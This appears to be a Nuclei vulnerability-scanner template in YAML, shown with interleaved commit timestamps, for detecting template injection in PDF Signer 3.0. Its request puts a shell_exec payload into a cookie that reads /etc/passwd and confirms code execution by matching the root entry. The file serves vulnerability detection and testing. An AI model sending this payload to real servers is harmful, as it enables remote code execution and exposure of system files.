nuclei-templates/http/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml

37 lines
1.1 KiB
YAML
Raw Normal View History

id: pdf-signer-ssti-to-rce
info:
name: PDF Signer 3.0 - Template Injection
author: madrobot
severity: critical
description: PDF Signer 3.0 is susceptible to a template injection which allows code execution, due to improper cookie handling and an improper CSRF implementation. An attacker can execute code on the server in the context of the web server.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cwe-id: CWE-1336
metadata:
max-request: 1
2023-10-14 11:27:55 +00:00
tags: ssti,rce,csrf
http:
- method: GET
path:
2021-01-13 07:31:46 +00:00
- "{{BaseURL}}"
2023-10-14 11:27:55 +00:00
headers:
2020-05-24 22:19:21 +00:00
Cookie: "CSRF-TOKEN=rnqvt{{shell_exec('cat /etc/passwd')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl"
2021-10-06 23:53:20 +00:00
skip-variables-check: true
2023-10-14 11:27:55 +00:00
matchers-condition: and
matchers:
- type: status
status:
2020-05-24 22:19:21 +00:00
- 200
2023-10-14 11:27:55 +00:00
- type: regex
regex:
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
part: body
# digest: 490a004630440220346f42ec245dba5a5da138043cc2f9e8f3e5979db4c9db118d907d6c5dbbc44602203f58036f592e1767eb81a87cdf8169f704f3715b094ef1cadbf36dba96651657:922c64590222798bb761d5b6d8e72950